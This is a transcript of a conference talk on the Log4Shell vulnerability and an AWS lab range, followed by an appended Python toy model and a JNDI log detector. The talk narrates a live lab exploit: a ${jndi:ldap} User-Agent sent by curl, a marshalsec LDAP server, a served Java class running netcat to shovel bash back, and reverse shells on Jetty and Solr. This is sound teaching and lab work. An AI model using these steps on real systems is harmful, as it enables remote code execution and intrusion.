
For my next trick I'll make this 2011 MacBook stay connected to the projector for the entire presentation. Welcome, thank you for coming. The title of this discussion is Log4Shell Exploitation and Cloud Range. You've probably read the description but we'll go over what this is going to be about. I'm going to talk about what is log4j, what was Log4Shell besides something that disrupted a lot of folks' holidays, I'm going to talk about who cares about it, we'll do some demonstrations with exploitation, and then I'll talk about how the range is built that helps demonstrate this exploitation. What I hope is that you'll take away an understanding of what the
Log4Shell vulnerability is, why it exists, and that you'll understand this simple, quick and cheap way to set up a test exploitation range in the cloud, so that you might, you know, the next time a more relevant vulnerability comes out, be in a good spot to test out exploits against it and try out all the stuff you're seeing on infosec Twitter easily and quickly. But first, why should you care about what I'm saying? Hopefully you're interested in it, but if not, well, just leave. Well, you all stayed, I appreciate that. My name is Carl Sikandik, again, call sign Rosie. I'm in the Air Force, active duty, so we have weird things like
call signs just like in Top Gun, you know, there I was, inverted. I'm stationed here in town. I've got a bachelor's in EE, a master's in computer science and I've got experience with cyber ranges. I've used that term a little bit, range, what does that mean? It's maybe a little bit more common in the military but it's also not totally uncommon. I was able to pull this dictionary definition up: it's a controlled, interactive technology environment where up-and-coming cyber security professionals can learn how to detect and mitigate cyber attacks using the same kind of equipment they will have on the job. So you can run a bunch of VMs in it, you can test it out. A lot
of folks have known this as a home lab in the past. Typically that involves like buying a server off eBay, setting it up in your basement. My wife would kill me if the basement sounded like an aircraft every time she went down there, and it's San Antonio so we don't have basements anyway. So I've been doing this kind of stuff on the cloud, and that terminology, you know, maybe you call this a cloud range or a home range in the cloud, a home lab in the cloud, I'm just going to call it a range. All right, so again here's what we're gonna do. First of all, what is Log4Shell? In December 2021 this
came out, I think it was on a Friday, and so folks had just left the office and they were probably driving home. I'm sure that they stopped, they pulled over, they looked at their news feed because their phone was exploding and they saw that this brand new vulnerability came out. Some people probably just turned right around and went back into the office and other people probably turned off their phone and pretended like they were in Bermuda. But in a little bit more detail, Log4Shell is a remote code execution vulnerability in any application logging using the right versions of the log4j 2 libraries. Specifically it's got to be logging user
inputs, so there are ways to use that log4j 2 library that don't log user inputs and those would not have really been vulnerable to this. You got to take that user input and log it. log4j 2 is a very popular logging framework within Java, it's in all kinds of different applications as we'll see in a second. And to drill down a little bit, if you're not familiar with what remote code execution means, it's just about the worst type of vulnerability you can get. It means that the attacker can execute any code that they want on your computer. So some common examples from today and yesterday are ransomware, keyloggers where they want to steal all your
passwords, or maybe they just want to generate a little bit of money on the side with a cryptocurrency miner, but it can be literally anything. The examples that we're going to do, we're just going to get a shell, a command line prompt, running on the attacked computer and we're going to send that command line prompt back to us as the attacker so we could take more actions, but it can be literally anything you imagine, you just write a little Java code and you're running. The root cause of this, again, is that the programmers trusted user input. This goes back to a feature, we'll talk about the feature in just a second, it's a feature in log4j that is
able to be misused. Looking in the manual around the time that this vulnerability came out, there's even a little note when this feature was added to log4j that programmers have got to be careful when they use it to avoid logging user input blindly. So that seems to have just been ignored in a lot of cases, or, you know, programmers didn't read the manual, surprise. So what is log4j? Let's step back and talk about what this logging framework is real quick. So here we've got an example where a laptop is browsing to a website on a web server written in Java, so it's doing a GET
request and we've got the web server logging a little bit of information using this log4j library. Specifically here the web server is logging the user agent string. If you don't know, a user agent string tells us what kind of browser the person's running, it can tell us if they're on a mobile device or on a desktop or laptop or something else, it can even tell us what operating system they're running. So it's very common to pull in and log those user agent strings, it tells you a lot about the people that are visiting your website. In this case nothing bad is happening, log4j is just seeing that user agent, passing it along to disk and writing it out like a happy boy.
Well, let's say you're the programmer of that web server and you want to get a little bit more complicated. You want to log, in addition to that user agent, the version of Java that your web server is running in. I don't know why you would want to do this, but it is a feature of log4j that you can. And so all the web server has got to do is take that user agent string, append a little bit of text, ${java:version}, and then when you pass that to log4j and you're using the most common method of logging, it's going to replace that ${...} bit with OpenJDK
11.0.13 or whatever version of Java the web server is running as. Maybe this is more useful in a non-web-server example, but this was a feature that was added to OpenJDK on purpose, this text substitution feature. It gets a little bit more powerful than just substituting in the version when you get to Log4Shell. This is a great way of demonstrating that power: log4j, that text substitution feature, can be used to run code, and if the user was not allowed to submit the code that's running this might be a useful feature in some use case, but unfortunately it's very commonly misused and thus we get the
Log4Shell vulnerability. So in this case here's a malicious user now on the laptop. You and me are sitting on this laptop and we're going to give this web server a bad day. We've replaced your typical user agent string with ${jndi:ldap://attacker server, blah blah blah}. Who, that in the back row, can you guys see that? Awesome. The reason I ask is in a little bit we're going to do some demos on the keyboard, that's kind of the more interesting piece. I think I made the text big enough
that everyone can see, but if not then please just scoot on forward. So okay, so we've replaced your typical user agent string with this malicious one. Now the web server gets it, it tries to log that user agent string, and when log4j gets that malicious user agent string the first thing it does is it says oh, I need to go out to a JNDI server, speaking in this little bit of LDAP JNDI protocol, and I need to ask it where to get some code from. So it makes a connection out to the attacker's server, it calls out to that JNDI LDAP server and it asks hey, where is this
little bit of code named, in this case, log4jcallback. You can call it whatever you want. And then the JNDI LDAP server responds hey, here's a web server where you can go pick up this malicious code, so that's what attacker:8080 is. It's that JNDI LDAP server, which is a specific weird language, responding hey, here's a web server where you can download the code. So then log4j says all right, now I got my web server, I'm going to go there, I'm going to download this malicious code, it doesn't know it's malicious, I'm going to download this code and I'm going to run it. So it calls out to the attacker web server, which is
attacker:8080 in this case. The attacker web server is going to oblige and give it back log4jcallback.class and then log4j is going to run it and that's going to pop a shell and return it to the attacker in the example case. So multiple stages of this attack, none of them are very complicated, and tooling is already built to allow all of these to happen really easily. So what is affected by this vulnerability? CISA put out a great GitHub site kind of the next day, so real quick, where they started taking user input on every server that companies and people reported was vulnerable to this. Minecraft, if you watched YouTube there
were a lot of videos of people popping Minecraft servers because it included log4j logging and it was very vulnerable. Elasticsearch and Logstash, there are a lot of caveats to that one about its vulnerability, but that was widely seen as directly vulnerable to this, and those two are embedded in a ton of other products, so then all those other products that embed Elasticsearch and Logstash for whatever reason were also seen as vulnerable. A number of other tools. Solr and Jetty are the ones that we're going to be using in the demonstration, so Solr is not a product I've used before Log4Shell, it's an Apache search engine, it looks
like something that enterprises might use, and Jetty is a web server by JetBrains and there's a few caveats to its vulnerability as well, but it's just a neat web server. Ghidra, the NSA's reverse engineering tool, was also vulnerable to this. A ton of VMware products. The SolarWinds folks had another bad Christmas, although certainly less bad than the year prior. And just a ton of stuff is on that list. It used to be a really massive list and now they've broken it out by alphabet so it's easier to browse, but you can go there and check out the full list, see if anything you've
got on there is vulnerable. So really, is all this stuff really vulnerable? Well, if you're running a JDK version newer than October 2018 there's an environment variable that automatically makes this a lot more difficult to exploit. It seemed like that was the recommended fix at first, and then attackers played cat and mouse and they found some ways around that, so then they recommended, well, set this setting in the log4j configuration. log4j is extremely configurable, it's really nice in that way. It seemed like that was a good fix for a little while but of course attackers seem to find ways around that as well. And then Elasticsearch, the major caveat
to Elasticsearch is that for a few years now they've been building Elasticsearch with a Java tool that adds a lot of automatic security features, I'm not a Java programmer, I'm sorry, but it's built in a way that disallows JNDI execution. And so I've had a couple people tell me that Elasticsearch is vulnerable. Certainly you can get those first stages of callbacks from it, I haven't seen anybody actually get remote code execution on Elasticsearch, so feel free, if you've got a counter demo to that then please let me know, I would love to see it. And I wouldn't bet on any of these as solid protections,
just update your stuff, the fixes are out now. Okay, so we've talked about log4j, we've talked about what Log4Shell is, we've talked about how it works, but there's nothing better than trying it out for ourselves, and so over the holidays I had a little time off and I spent the evenings after my wife and daughter went to bed messing around with this. And so, you know, huge thanks to my wife for just ignoring all my BS around this, this is just a love thing. In order to mess around with this vulnerability I set up a range that looks just like this on AWS, so there's
three computers, three EC2 instances that I stood up on AWS. The Kali box is running Kali Linux, Solr is just running Debian and then I've installed Solr and Jetty, and I can install any other service that's got a Docker container associated with it on that Debian box, excuse me, and we could go further, we could install anything we want. Those are both connected, they're on separate subnets but they're connected in the same virtual private cloud on AWS so they can talk to each other easily through something similar to network routing. The only way that either of those can talk to the internet, or that the internet can talk to them, is through
that jump host there. That's running Guacamole on it, that's an Apache product that gives you a remote desktop interface to VNC remote desktop, so it's just a great front end. And in this demonstration the first thing we're going to do, we're going to connect to that Guacamole server running on the jump host and then we'll be able to demonstrate exploitation from the Kali box across to the Solr host. So let's do that, that's the fun part. Now this is the part where I might screw up this connection but I'm going to try really hard not to. So you can't see this but the code for all this was provided on a
GitHub repo, you can download it, there's instructions so you can easily set this up and run it yourself. I wrote those instructions mostly as a reminder to me in a year when it's the holidays again and of course no new vulnerabilities will be out and I'll want to play with them and I'll forget how to do all this. But one of the things it requires is a domain name from FreeDNS, afraid.org, those guys are fantastic, and so this one is like log4jrange.lee.mx, and Guacamole just presents a login, and this gets set up automatically during provisioning and configuration. So I'll go ahead and log into this. I
actually set this up last night to hopefully appease the demo gods, we'll see how well that goes. It seemed to still be working a little while ago. After this part we'll go through redeployment so you can see that all work, but on here we've got access to the Solr box and we've got access to the Kali box. So again, this is just a regular Debian install with a couple containers running on it. When I ran sudo docker ps, I apologize this text is a little small, but it's running essentially two Docker containers: a vulnerable Jetty server, which I had to create a custom container for to make it vulnerable
because with the default install parameters of Jetty it is not vulnerable, it's just some configuration options that make it vulnerable, and then an install of Solr, this is the default Solr Docker container that you can grab from Docker Hub. Solr is listening on port 8983 and Jetty's listening on port 80. But we don't have to know that, we can switch over to our Kali box.
Awesome. And, you know, if we were the attacker, all we might know is, oh, right there, all we might know is kind of the network layout of our target organization and of course we'd know our own IP address, but we see our target organization is in the 10.18.66 range. So we can hop on over to our Kali box and we can do like an nmap -sn 10.18.66.*, and we'll just do kind of a ping sweep of that whole little bit of the network and see if there are any open boxes there, and then we can scan. There's only one box so we should get that
one back, and while we're doing that let's look at what our IP address is, 10.18.225. Thank you.
I'm going to go ahead and open a new tab. Once we get that back we're going to want to port scan that box more clearly, I think it's .163. I'm cheating a little bit because, again, I tested this out last night to make sure it's good, so we should get in another minute or so a little return here that says it's .163 that's vulnerable. But if we do a port scan against .163, just for time, we can see SSH, HTTP, that's going to be that Jetty web server, and some VNC and X11 ports are open. If this was a real server that VNC might be much more restricted than it is, we might
not be able to port scan it, and X11 would be off limits as well, so some changes you might want to make if you're looking for a little bit more realism, but here we're looking for a basic ability to demonstrate this vulnerability. So if we just go to that IP address directly and we look at what's on port 80 we see it's the Jetty server, and if we go to that Solr port, 8983, we're going to see it's Solr, just as we would expect, from this Kali box. So that Solr port didn't show up in the nmap scan, anybody know why?
Yep, it's not in the default range, exactly. 8983 is not one of the default ports nmap is going to scan. If you were an attacker looking for specifically Solr boxes then of course it would be in your port scanning range, and here we own the server so we've got an easier time. You can see here nmap was able to find that one running box on the subnet. All right, so we found our target. Now from the attacker station we need to set up those different servers that are going to get us to exploitation, and just because I'm a cheater I've put a bunch of the commands and
everything that you need to do this right into the GitHub repo, so we can just go there from the Kali box. It's got some information on deploying the range, setting it all up, it's got all this information here, zoom in a little bit here.
It's got the URLs on the Solr server that are going to get us execution, it's got the URL, or user agent string, on the Jetty box that's going to give us exploitation, and it's kind of got a step-by-step walkthrough of how to do this. So if you remember, that first server that we need is that JNDI LDAP server. Well, as part of provisioning and configuring this range I download some other dude's code to do this, this marshalsec guy, and I found out about this by Googling around and finding an awesome SANS tutorial on this, so thank you SANS, thank you marshalsec guy. That information is located there and they do a little
bit more of a deep dive, especially the marshalsec guy does a good deep dive into what this protocol is and how it works. So just to demonstrate exploitation though, we need to cd into this marshalsec directory and then we need to run the Java server, the JNDI server that's going to get us, okay, so as part of this command you can see it's just executing a jar, but we've got to replace this Kali box IP address with what our IP address is, oh, which is 225.8, I'm glad I checked, and I screwed that up, thank you, 10.18.225.8. So what this is going to do, start up this marshalsec server, it's
going to tell it: anybody that's connecting asking for the address where it can download this malicious code, give them 10.18.225.8:8080 and tell them to download log4jcallback. We can name it whatever we want but that's the name we're using for this demonstration. Okay, so now it's listening on port 1389 on this Kali box. Now we've got to also stand up that web server so that we can serve our malicious code from that location, so I'm going to do that over here, and just to demonstrate this is, come on, what's going on, oh, a little bad network latency, this normally moves a little bit faster, so a little bad network latency.
Okay, we're back to moving again. Okay, so the command to start up the Python web server is right there, you can just copy and paste it. Kali's been updated a little bit since I wrote this so now you got to say python3. This is, if you're not familiar, basically the fastest way to start up a web server. python3 has a thing that serves files out of your current directory just by doing this little command, http.server as the module, port 8080. Okay, so now we've got a web server. Now we've got to write our malicious code. So I made this easy, just copy and paste this malicious code into a file. Even easier than that though,
when you set this range up the file is already present, log4jcallback.java, and now normally you've got to come in here and replace this IP address with your current IP address. Since I tested this last night it's already replaced, but it's a little hard to see there so let me zoom in here. Let's talk about what this malicious code does real quick. This is going to create a class log4jcallback, and it's got to be named the same thing as the file name because this is Java, but all that class does is run this little bit of code inside the static block when it gets started up, and what that does is uses the java.lang
Runtime exec function to execute this command. netcat is this nc, it's the Swiss army knife for TCP, and it's gonna create a TCP connection back to our Kali box on port 8081 and it's going to execute bash, which is the command line on Linux, and send anything it gets from the command line back over that connection, and anything it receives it's going to put right in the command prompt. So this is a very common way to shovel a shell back to yourself as the attacker and that's exactly what we're using here, it's going to work. So we've got it all written in our file, we have to compile it, and that code that's in there can
be anything you imagine, that's Java code, it can be directly your keylogger if you figure out a way to do that, it can mine cryptocurrency, whatever you want you can cram it in there, compile it and send it. All right, so now we've got our callback here, our malicious code. The last server that we've got to run is the thing that receives that shell when it gets shoveled back to us, and so here's a little command that's going to do that for us. Okay, so in this window we've got our JNDI server, in this window we've got our web server that's going to send the malicious code in response to
the JNDI service redirect, and in this server we're going to receive our callback after our malicious code runs. So I'm going to pop up one more tab, unfortunately the screen space won't let me show them all at the same time or you wouldn't be able to see anything. In order to make the actual call now we've got to embed that JNDI LDAP string into one of those malicious spots, and again those were visible right up at the top, so let's exploit this Jetty server first, so
sorry, let's just copy and paste that URL in here. We've got to replace the Solr address with our Solr box, 10.18. what was it, 66.163, let me just verify that real quick.
10.18.66.163. That Jetty server is just at port 80 so the default here is going to work, and now we got to cram in this jndi:ldap:// our attacker box, 10.18.225.8 I think, and we've got to tell it which port to go to, and the port is visible over here, 1389, :1389/ and then I think it's just pound sign log4jcallback, but I'm pretty forgetful so let me just verify right here, no pound sign log4jcallback, excellent. So now if we use curl to browse to that website, this is almost going to work, so we can see that curl returned the
website but we can see that we never got an initial call out to our JNDI LDAP server, and that's because you also have to escape these braces because this is the Linux command line, so just put a backslash in front of your braces, it's like a bashism. Let's try this again. So here now we can see a ton of stuff was received by our JNDI LDAP server, log4j tried to execute this a bunch of times, we can see that our web server received the redirect request and it served up our class, and we can see that we got a connection to our reverse shell home. So let's look around,
we can see this looks like something, whoami, I'm a jetty user, and so now you could do any kind of post exploitation activities you wanted to on this box, the sky's your limit. This is a Docker container so a lot of the tools that you might expect to find on just like a regular Linux server are not going to be present, but this is an exploitation test range and so we don't really need to do the post exploitation. Now you can use Metasploit to generate a Java Meterpreter and that'll work great as long as you kind of wrap it in a weird way, I think I have instructions on there,
you can get a callback from Meterpreter to Metasploit, it's awesome, and then you got your whole post exploitation toolkit, everything that's part of Metasploit is available to you then, and of course whatever else you want to do you can also do. Okay, so we had success on the Jetty box and let's try the Solr box real quick. The URL is almost the same, we got to put in the Jetty port 8983 and we got to put in, I think it's solr/cores/ is one of them, oh sorry, I found a few different spots on the default Solr install that are vulnerable, 8983, solr/admin/
cores, solr/admin/config, solr/admin/collections. So we'll do, I think I typed that wrong, solr/admin/cores. Awesome, okay, so we got something back, let's see if we got our, oh, we didn't get a shell back, I must, oh, thank you.
Ah, that looks much more like what I'm used to, okay, so thank you. So the URL is correct on the GitHub site, I just typed it wrong live, no surprise. Let's see where we got our connection from. You can see this looks like a Solr something, whoami, solr, so we're on that Solr box now, it gave us a callback, easy peasy. All right, so we've seen exploitation, we've demonstrated this range, the next thing that you're probably interested in is how did this get deployed, how can I run this on my own at home using my own AWS account, or how can I set up something similar for tomorrow's
vulnerabilities. There's three steps to the deployment: first of all, create some infrastructure within Amazon Web Services, and we're going to use Terraform to do that; configure that infrastructure, we're going to use Ansible to do that; and then start those vulnerable services so that you can go in there and exploit them, and that happens automatically as a result of Ansible. I'm going to demonstrate this, so I'm logged into my home server that I've used to deploy this, and we'll talk about the directory structure here in a minute, but this is the exact same thing you'll get from the GitHub. There's a terraform directory and an ansible directory, those are the most
critical things. First we've got to deploy the infrastructure, so we'll go into terraform. Now it's already deployed, so let's destroy it, terraform destroy, I tried to type that wrong. So Terraform is going to do a little calculation, it's gonna consider what's deployed currently to AWS and what actually needs to be deployed, and since we said destroy it's gonna destroy it all. Now this is going to take a couple of minutes and then we'll re-deploy it again and we'll run Ansible, but while we do that let's go ahead and look at how this kind of works behind the scenes. So let's see if, well, I'm going to do it
over on the screen here sorry
oh awesome
So again, the main directories in here are ansible and terraform. The README in the terraform directory is going to tell you exactly what you've got to run. You've got to create some SSH keys, just running these exact commands, you run terraform init and terraform apply and it's going to use the .tf files in this directory to configure your range. Is anybody familiar with Terraform? Yeah, this could be like a whole four hour, five day talk on how Terraform works, but it's basically going to cram all these .tf files together and do the best job of figuring out what that says you want your AWS
infrastructure to look like. It's going to start with main.tf because that's where the base of my configuration is written, there's nothing special about main.tf. Inside that it's got some variables that describe hey, we want to do this on AWS, we want to do it within us-east-2, I want to apply a tag to every resource that I set up, here are the Debian and Kali images, AMIs, that I want to install on some EC2 virtual machines, and here are the types of machine that I want to deploy, small, medium and large, all set up in variables so we can refer to them later. It's also going to describe some basic subnetting
that we can use in other files. The red box, the Kali box, the blue box, that Solr box, and the administrator box, that jump host, are all described in separate .tf Terraform files, and as a result of this we want to easily pass this configuration over to Ansible, so this ansible hosts .tf file is automatically going to use a template to create an Ansible hosts file and to drop it in the right spot where Ansible needs it for configuration. And then there's a secrets.tf template. This is the other thing, if you want to deploy this yourself, you need to set up; it's going to ask for hey, what do you want the passwords to be, you get to make
them up, what's your domain on afraid.org, and how do I update the IP address of that domain. That's the kind of stuff that you're going to have to put in your own secrets.tf, I wouldn't want to deploy that on GitHub. All right, let's see how this is going. So Terraform has successfully destroyed, so now let's try terraform apply, and right now I'm going to have basically none of this stuff on my AWS infrastructure and Terraform is going to go ahead and set all of it up based on this configuration. It goes from me spending zero dollars to AWS to me spending about three dollars a day, it's a pretty cheap range fortunately,
and it's going to do that in just a couple of minutes here. So after we do that Terraform configuration we're going to need to change over to the ansible directory, and if you're familiar with Ansible at all we're just going to run a playbook, playbook.yaml. Hopefully I'll have time to demonstrate this real quick, but this has a configuration section for each of the different hosts, the jump host, the red host and the blue host, and I can just tell it which roles I want each of those to inhabit. I want my jump host to be running Guacamole, it needs Docker to do that so I also want it to be a Docker server. I want my Kali box to have a
desktop environment and to be running a VNC server and to automatically configure some of that JNDI stuff that we talked about, JNDI server right there, and I want my Solr host to be running Solr and Jetty. I also have the ability to set up an Elasticsearch host, but I wasn't able to get execution there so it's less interesting. Now none of that is magic either, all of those roles correspond to a directory in the ansible roles directory, and so this is the meat of the Ansible configuration. You can see there's directories that tell Ansible how to set up each of those things, guacamole, solr, jndi, all that stuff, and we could dive in on how those work if
you're interested, it's all documented in code, it's all going to work for you, feel free to take a look. Let's see where Terraform is. So Terraform has now deployed the infrastructure, you can see that the last thing it's doing is it's telling us the IP addresses in that environment, but we don't need to look at that because we can just cd ../ansible and we can run ansible-playbook playbook.yaml. Terraform has already created the hosts file for us, we're good to go. Now this is going to take several minutes because installing a graphical user interface on Linux takes a little while, but it's just going to chug through, it's going to
deploy everything, and it's worked three times in a row now. We're not gonna have time to see it finish this time, but it will. Okay, so we've talked about how to deploy, we've demonstrated it a little bit. The overall cost of this is tiny, it's deploying exactly what it says here and the cost is less than three dollars a day. You don't need to run it for a full day though, if you're going to play with it for four hours, stand it up, play with it and then terraform destroy when you're done. So the cost is really tiny. This allows you to stand up
hundreds of servers if you want and play with them for a little while for real cheap, or just three. We've talked about how all those different components work, I've got a link to the code back at the beginning of the slides. Some of the remaining to-dos are: if this was a real range we might want to be able to observe those attacker actions in real time using Security Onion, and so it would be great to automatically deploy Security Onion into this VPC and monitor those attacker actions, and you could get a feel from both the red and the blue side. That's not done in this yet, maybe to come. It would be great to use actual Linux
boxes or real routers deployed to AWS, because right now the networking is just using AWS's subnets and security groups and those are kind of just a simulation of what we might want to see in the real world. And last up, I want to save some time for questions, so I just wanted to say thank you to all these groups: afraid.org, an amazing DNS provider for free, so that made this really easy to demonstrate; Let's Encrypt, obviously; thanks SANS for letting me steal your stuff; Jonas Alfredsson has got an awesome nginx plus Let's Encrypt Docker container that's made my life a lot
easier, including this project; and thanks Apache Software Foundation, not only did you make log4j which gave me the impetus for this talk today, you also made Guacamole which let me experiment with it. And thanks again to my wife who lets me screw around with this stuff instead of sleeping. All right, any questions? There we go, we've got a few minutes for Q&A, if you have anything just line up right here in the middle, I'll give you the mic for that. But thank you Carl so far. Anybody got any questions? Okay, I think we're good then, all right thanks, thank you everybody. [Applause]
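The talk explains the mechanism in words: log4j expands "${prefix:key}" lookups inside whatever text it is asked to log, so a "${jndi:...}" string arriving in a User-Agent header becomes a lookup, and the interim mitigation was a configuration setting that stops lookups in message text. The following is an added illustration written for this transcript, not code from the talk, its GitHub repo, or the log4j project. It is a small Python model of that substitution with lookups on (the vulnerable behaviour) and off (approximating the log4j2.formatMsgNoLookups=true setting; log4j 2.16 later removed message lookups altogether), plus a detector that flags JNDI lookup strings in access-log lines. It never touches the network: a JNDI lookup is only recorded. The ToyLogger class, the Java version string, the host name attacker.example and the log lines are all constructed for the example.

```python
"""Toy model of log4j 2's ${prefix:key} lookup substitution (the feature
behind Log4Shell), the "no lookups on message text" mitigation, and a
simple detector for JNDI lookup strings in web-server access logs.

Added illustration, not log4j's code: no network I/O happens here. A
${jndi:...} lookup is only recorded so its effect can be observed. All
log lines, addresses and version strings below are constructed."""
import re
from dataclasses import dataclass, field

# One non-nested ${prefix:key} token, e.g. ${java:version} or ${jndi:ldap://...}.
LOOKUP = re.compile(r"\$\{([A-Za-z]+):([^${}]*)\}")


@dataclass
class ToyLogger:
    """Models message formatting. lookups_enabled=True is the vulnerable
    behaviour (lookups expand even inside user-supplied text); False models
    the formatMsgNoLookups-style mitigation where the message is literal."""
    lookups_enabled: bool = True
    java_version: str = "OpenJDK 11.0.13"               # constructed stand-in for ${java:version}
    jndi_requests: list = field(default_factory=list)   # addresses a real lookup would contact

    def _resolve(self, prefix: str, key: str):
        if prefix == "java" and key == "version":
            return self.java_version
        if prefix == "jndi":
            # A vulnerable log4j would connect to `key`, fetch a class and run it.
            # Here we only record the address and substitute a marker string.
            self.jndi_requests.append(key)
            return "<jndi lookup would happen here>"
        return None  # unknown lookup: left in the text unchanged

    def format(self, message: str) -> str:
        """Return the text that would be written to the log for `message`."""
        if not self.lookups_enabled:
            return message  # message is literal text; no substitution at all

        def substitute(m: re.Match) -> str:
            value = self._resolve(m.group(1), m.group(2))
            return m.group(0) if value is None else value

        previous = None
        while previous != message:      # repeat so nested lookups resolve inside out
            previous, message = message, LOOKUP.sub(substitute, message)
        return message


# Constructed access-log lines; line 2 carries the malicious User-Agent.
ACCESS_LOG = [
    '10.18.66.50 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"',
    '10.18.225.8 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example:1389/#log4jcallback}"',
    '10.18.66.51 - - "GET /solr/ HTTP/1.1" 200 "curl/7.74.0"',
]

# Case-insensitive, whitespace-tolerant match for the start of a JNDI lookup.
JNDI_MARKER = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_jndi_attempts(lines):
    """Return 1-based indexes of log lines containing a JNDI lookup string."""
    return [i for i, line in enumerate(lines, start=1) if JNDI_MARKER.search(line)]


def demo():
    """Run the three scenarios and return what each logger would have written."""
    benign = "Mozilla/5.0 running on ${java:version}"
    malicious = "${jndi:ldap://attacker.example:1389/#log4jcallback}"

    vulnerable = ToyLogger(lookups_enabled=True)
    hardened = ToyLogger(lookups_enabled=False)
    return {
        "benign_expanded": vulnerable.format(benign),
        "vulnerable_output": vulnerable.format(malicious),
        "vulnerable_jndi_requests": list(vulnerable.jndi_requests),
        "hardened_output": hardened.format(malicious),
        "hardened_jndi_requests": list(hardened.jndi_requests),
        "flagged_log_lines": find_jndi_attempts(ACCESS_LOG),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The detector only matches the plain form shown in the talk; in practice it belongs alongside the real fix the speaker recommends, updating log4j, rather than in place of it, since a log-line match tells you an attempt was logged, not whether the lookup succeeded.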